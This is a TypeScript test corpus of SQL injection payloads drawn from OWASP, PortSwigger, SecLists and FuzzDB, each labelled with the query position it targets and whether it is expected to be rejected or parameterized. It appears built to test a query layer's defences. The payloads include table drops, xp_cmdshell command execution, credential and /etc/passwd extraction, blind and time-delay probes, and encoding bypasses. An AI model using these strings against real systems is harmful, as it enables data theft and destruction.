export type SqlInjectionApplicablePosition = 'identifier' | 'value' | 'order' | 'relation' | 'lookup_key';
export type SqlInjectionExpectedBehavior = 'reject' | 'parameterize';

export interface SqlInjectionCase {
    id: string;
    source: string;
    sourceUrl: string;
    category: string;
    payload: string;
    applicablePosition: SqlInjectionApplicablePosition;
    expectedBehavior: SqlInjectionExpectedBehavior;
}

export const sqlInjectionCorpus = [
    {
        id: 'basic_quote_breaking-01',
        source: 'OWASP WSTG SQL Injection',
        sourceUrl:
            'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection',
        category: 'Basic quote-breaking / tautology / contradiction',
        payload: "' OR '1'='1",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'basic_quote_breaking-02',
        source: 'OWASP WSTG SQL Injection',
        sourceUrl:
            'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection',
        category: 'Basic quote-breaking / tautology / contradiction',
        payload: '" OR "1"="1',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'basic_quote_breaking-03',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Basic quote-breaking / tautology / contradiction',
        payload: "' OR 1=1 --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'basic_quote_breaking-04',
        source: 'OWASP SQL Injection Prevention Cheat Sheet',
        sourceUrl: 'https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html',
        category: 'Basic quote-breaking / tautology / contradiction',
        payload: "admin' OR '1'='1",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'basic_quote_breaking-05',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'Basic quote-breaking / tautology / contradiction',
        payload: "x' OR 2>1 --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'basic_quote_breaking-06',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Basic quote-breaking / tautology / contradiction',
        payload: "') OR ('1'='1",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'basic_quote_breaking-07',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Basic quote-breaking / tautology / contradiction',
        payload: '") OR ("1"="1',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'basic_quote_breaking-08',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'Basic quote-breaking / tautology / contradiction',
        payload: "' OR 'x'='x' #",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'basic_quote_breaking-09',
        source: 'CWE-89 / NIST-linked guidance',
        sourceUrl: 'https://cwe.mitre.org/data/definitions/89.html',
        category: 'Basic quote-breaking / tautology / contradiction',
        payload: 'or 1=1',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'basic_quote_breaking-10',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'Basic quote-breaking / tautology / contradiction',
        payload: "a' or 'a'='a",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'basic_quote_breaking-11',
        source: 'OWASP WSTG SQL Injection',
        sourceUrl:
            'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection',
        category: 'Basic quote-breaking / tautology / contradiction',
        payload: "value' OR 'abc'='abc",
        applicablePosition: 'identifier',
        expectedBehavior: 'reject',
    },
    {
        id: 'basic_quote_breaking-12',
        source: 'CWE-89 / NIST-linked guidance',
        sourceUrl: 'https://cwe.mitre.org/data/definitions/89.html',
        category: 'Basic quote-breaking / tautology / contradiction',
        payload: '0 or 1=1',
        applicablePosition: 'identifier',
        expectedBehavior: 'reject',
    },
    {
        id: 'basic_quote_breaking-13',
        source: 'OWASP SQL Injection Prevention Cheat Sheet',
        sourceUrl: 'https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html',
        category: 'Basic quote-breaking / tautology / contradiction',
        payload: "') or ('unusual'='unusual",
        applicablePosition: 'order',
        expectedBehavior: 'reject',
    },
    {
        id: 'basic_quote_breaking-14',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'Basic quote-breaking / tautology / contradiction',
        payload: "' OR 'text' = N'text'",
        applicablePosition: 'lookup_key',
        expectedBehavior: 'reject',
    },
    {
        id: 'basic_quote_breaking-15',
        source: 'OWASP WSTG SQL Injection',
        sourceUrl:
            'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection',
        category: 'Basic quote-breaking / tautology / contradiction',
        payload: "') OR 3=3 --",
        applicablePosition: 'relation',
        expectedBehavior: 'reject',
    },
    {
        id: 'statement_termination-01',
        source: 'OWASP WSTG SQL Injection',
        sourceUrl:
            'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection',
        category: 'Statement termination / stacked queries',
        payload: "'; DROP TABLE users; --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'statement_termination-02',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Statement termination / stacked queries',
        payload: '1; SELECT @@version',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'statement_termination-03',
        source: 'CWE-89 / NIST-linked guidance',
        sourceUrl: 'https://cwe.mitre.org/data/definitions/89.html',
        category: 'Statement termination / stacked queries',
        payload: '0; INSERT INTO audit VALUES (1)',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'statement_termination-04',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'Statement termination / stacked queries',
        payload: "'; EXEC xp_cmdshell 'dir'; --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'statement_termination-05',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Statement termination / stacked queries',
        payload: "'; WAITFOR DELAY '0:0:10'; --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'statement_termination-06',
        source: 'OWASP WSTG SQL Injection',
        sourceUrl:
            'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection',
        category: 'Statement termination / stacked queries',
        payload: '1); DROP TABLE posts; --',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'statement_termination-07',
        source: 'CWE-89 / NIST-linked guidance',
        sourceUrl: 'https://cwe.mitre.org/data/definitions/89.html',
        category: 'Statement termination / stacked queries',
        payload: "'); COMMIT; --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'statement_termination-08',
        source: 'CWE-89 / NIST-linked guidance',
        sourceUrl: 'https://cwe.mitre.org/data/definitions/89.html',
        category: 'Statement termination / stacked queries',
        payload: '0)); SHUTDOWN; --',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'statement_termination-09',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'Statement termination / stacked queries',
        payload: "' ; truncate table users; --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'statement_termination-10',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'Statement termination / stacked queries',
        payload: "; exec master..xp_cmdshell 'ping 127.0.0.1'--",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'statement_termination-11',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'Statement termination / stacked queries',
        payload: "'); declare @q nvarchar(200); --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'statement_termination-12',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Statement termination / stacked queries',
        payload: "1; copy (select '') to program 'id'--",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'statement_termination-13',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Statement termination / stacked queries',
        payload: "'; begin dbms_lock.sleep(10); end; --",
        applicablePosition: 'identifier',
        expectedBehavior: 'reject',
    },
    {
        id: 'statement_termination-14',
        source: 'CWE-89 / NIST-linked guidance',
        sourceUrl: 'https://cwe.mitre.org/data/definitions/89.html',
        category: 'Statement termination / stacked queries',
        payload: '1; create temp table pwned(id int)--',
        applicablePosition: 'order',
        expectedBehavior: 'reject',
    },
    {
        id: 'statement_termination-15',
        source: 'OWASP WSTG SQL Injection',
        sourceUrl:
            'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection',
        category: 'Statement termination / stacked queries',
        payload: "'); update users set admin=1--",
        applicablePosition: 'lookup_key',
        expectedBehavior: 'reject',
    },
    {
        id: 'comment_truncation-01',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Comment truncation / inline comment abuse',
        payload: "' --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'comment_truncation-02',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Comment truncation / inline comment abuse',
        payload: "'-- ",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'comment_truncation-03',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Comment truncation / inline comment abuse',
        payload: "' #",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'comment_truncation-04',
        source: 'OWASP WSTG SQL Injection',
        sourceUrl:
            'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection',
        category: 'Comment truncation / inline comment abuse',
        payload: "'/*",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'comment_truncation-05',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Comment truncation / inline comment abuse',
        payload: "'/**/",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'comment_truncation-06',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Comment truncation / inline comment abuse',
        payload: "admin'/*comment*/OR/*comment*/1=1",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'comment_truncation-07',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Comment truncation / inline comment abuse',
        payload: "' /*!50000OR*/ 1=1",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'comment_truncation-08',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'Comment truncation / inline comment abuse',
        payload: "'--+-",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'comment_truncation-09',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Comment truncation / inline comment abuse',
        payload: "' %2D%2D",
        applicablePosition: 'order',
        expectedBehavior: 'reject',
    },
    {
        id: 'comment_truncation-10',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Comment truncation / inline comment abuse',
        payload: "' ;--",
        applicablePosition: 'lookup_key',
        expectedBehavior: 'reject',
    },
    {
        id: 'union_based_extraction-01',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'UNION-based extraction payloads',
        payload: "' UNION SELECT NULL --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'union_based_extraction-02',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'UNION-based extraction payloads',
        payload: "' UNION SELECT NULL,NULL --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'union_based_extraction-03',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'UNION-based extraction payloads',
        payload: "' UNION ALL SELECT username,password FROM users --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'union_based_extraction-04',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'UNION-based extraction payloads',
        payload: "' UNION SELECT @@version,NULL --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'union_based_extraction-05',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'UNION-based extraction payloads',
        payload: "' UNION SELECT table_name,NULL FROM information_schema.tables --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'union_based_extraction-06',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'UNION-based extraction payloads',
        payload: "') UNION SELECT load_file('/etc/passwd'),NULL --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'union_based_extraction-07',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'UNION-based extraction payloads',
        payload: "' UNION SELECT banner FROM v$version --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'union_based_extraction-08',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'UNION-based extraction payloads',
        payload: "' UNION SELECT version(),current_user --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'union_based_extraction-09',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'UNION-based extraction payloads',
        payload: "' UNION SELECT 1,2,3 --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'union_based_extraction-10',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'UNION-based extraction payloads',
        payload: "' UNION ALL SELECT 1,2,3,4 --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'union_based_extraction-11',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'UNION-based extraction payloads',
        payload: "' UNION SELECT database(),user() --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'union_based_extraction-12',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'UNION-based extraction payloads',
        payload: "' UNION SELECT group_concat(table_name),NULL FROM information_schema.tables --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'union_based_extraction-13',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'UNION-based extraction payloads',
        payload: '" union select * from information_schema.columns --',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'union_based_extraction-14',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'UNION-based extraction payloads',
        payload: "' UNION SELECT @@servername,NULL --",
        applicablePosition: 'order',
        expectedBehavior: 'reject',
    },
    {
        id: 'union_based_extraction-15',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'UNION-based extraction payloads',
        payload: "') UNION SELECT '<?xml version=\"1.0\"?>',NULL --",
        applicablePosition: 'identifier',
        expectedBehavior: 'reject',
    },
    {
        id: 'error_based-01',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Error-based payloads',
        payload: "' AND CAST((SELECT password FROM users LIMIT 1) AS int)=1 --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'error_based-02',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Error-based payloads',
        payload: "' AND 1=CONVERT(int,(SELECT @@version)) --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'error_based-03',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Error-based payloads',
        payload: "' AND EXTRACTVALUE(1,CONCAT(0x5c,(SELECT user()))) --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'error_based-04',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Error-based payloads',
        payload: "' AND updatexml(1,concat(0x7e,(SELECT version())),1) --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'error_based-05',
        source: 'CWE-89 / NIST-linked guidance',
        sourceUrl: 'https://cwe.mitre.org/data/definitions/89.html',
        category: 'Error-based payloads',
        payload: "' AND 1=(SELECT 1/0) --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'error_based-06',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Error-based payloads',
        payload: "' AND to_char(1/0) IS NOT NULL --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'error_based-07',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'Error-based payloads',
        payload: "' OR JSON_KEYS((SELECT CONVERT((SELECT @@version) USING utf8))) --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'error_based-08',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Error-based payloads',
        payload: "' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE CAST('x' AS int) END)=1 --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'error_based-09',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'Error-based payloads',
        payload:
            "' AND floor(rand(0)*2)=(SELECT count(*) FROM information_schema.tables GROUP BY concat(version(),floor(rand(0)*2))) --",
        applicablePosition: 'relation',
        expectedBehavior: 'reject',
    },
    {
        id: 'error_based-10',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Error-based payloads',
        payload: "' AND xpath('foo',xmltype('<a/>')) is not null --",
        applicablePosition: 'identifier',
        expectedBehavior: 'reject',
    },
    {
        id: 'blind_boolean-01',
        source: 'OWASP Blind SQL Injection',
        sourceUrl: 'https://owasp.org/www-community/attacks/Blind_SQL_Injection',
        category: 'Blind boolean payloads',
        payload: "' AND 1=1 --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'blind_boolean-02',
        source: 'OWASP Blind SQL Injection',
        sourceUrl: 'https://owasp.org/www-community/attacks/Blind_SQL_Injection',
        category: 'Blind boolean payloads',
        payload: "' AND 1=2 --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'blind_boolean-03',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Blind boolean payloads',
        payload: "' AND substring((SELECT current_user),1,1)='a' --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'blind_boolean-04',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Blind boolean payloads',
        payload: "' AND ascii(substring((SELECT database()),1,1))>64 --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'blind_boolean-05',
        source: 'OWASP Blind SQL Injection',
        sourceUrl: 'https://owasp.org/www-community/attacks/Blind_SQL_Injection',
        category: 'Blind boolean payloads',
        payload: "' AND (SELECT count(*) FROM users)>0 --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'blind_boolean-06',
        source: 'OWASP Blind SQL Injection',
        sourceUrl: 'https://owasp.org/www-community/attacks/Blind_SQL_Injection',
        category: 'Blind boolean payloads',
        payload: "' OR EXISTS(SELECT 1 FROM users) --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'blind_boolean-07',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Blind boolean payloads',
        payload: "' AND length((SELECT version()))>1 --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'blind_boolean-08',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Blind boolean payloads',
        payload: "' AND (SELECT current_setting('server_version')) like '1%' --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'blind_boolean-09',
        source: 'OWASP Blind SQL Injection',
        sourceUrl: 'https://owasp.org/www-community/attacks/Blind_SQL_Injection',
        category: 'Blind boolean payloads',
        payload: "' AND mid((SELECT user()),1,1)='r' --",
        applicablePosition: 'identifier',
        expectedBehavior: 'reject',
    },
    {
        id: 'blind_boolean-10',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Blind boolean payloads',
        payload: "' AND hex(substr((SELECT sqlite_version()),1,1))='33' --",
        applicablePosition: 'order',
        expectedBehavior: 'reject',
    },
    {
        id: 'time_delay-01',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Time-delay payloads',
        payload: "' OR pg_sleep(10) --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'time_delay-02',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Time-delay payloads',
        payload: "' OR SLEEP(10) --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'time_delay-03',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Time-delay payloads',
        payload: "'; WAITFOR DELAY '0:0:10' --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'time_delay-04',
        source: 'FuzzDB Generic Blind SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/sql-injection/detect/GenericBlind.txt',
        category: 'Time-delay payloads',
        payload: "' OR benchmark(10000000,MD5(1))#",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'time_delay-05',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Time-delay payloads',
        payload: "' AND CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'time_delay-06',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Time-delay payloads',
        payload: "' AND IF(1=1,SLEEP(5),0) --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'time_delay-07',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'Time-delay payloads',
        payload: "' ; dbms_pipe.receive_message(('a'),10) --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'time_delay-08',
        source: 'OWASP Blind SQL Injection',
        sourceUrl: 'https://owasp.org/www-community/attacks/Blind_SQL_Injection',
        category: 'Time-delay payloads',
        payload: "' || pg_sleep(5) --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'time_delay-09',
        source: 'FuzzDB Generic Blind SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/sql-injection/detect/GenericBlind.txt',
        category: 'Time-delay payloads',
        payload: "');waitfor delay '0:0:__TIME__'--",
        applicablePosition: 'relation',
        expectedBehavior: 'reject',
    },
    {
        id: 'time_delay-10',
        source: 'FuzzDB Generic Blind SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/sql-injection/detect/GenericBlind.txt',
        category: 'Time-delay payloads',
        payload: '1) or sleep(__TIME__)#',
        applicablePosition: 'identifier',
        expectedBehavior: 'reject',
    },
    {
        id: 'encoding_whitespace_case_obfuscation-01',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Encoding / whitespace / case obfuscation',
        payload: '%27%20OR%201=1--',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'encoding_whitespace_case_obfuscation-02',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Encoding / whitespace / case obfuscation',
        payload: '%2527%2520OR%25201%253D1--',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'encoding_whitespace_case_obfuscation-03',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Encoding / whitespace / case obfuscation',
        payload: '%bf%27 OR 1=1 --',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'encoding_whitespace_case_obfuscation-04',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Encoding / whitespace / case obfuscation',
        payload: "%df' OR 1=1 --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
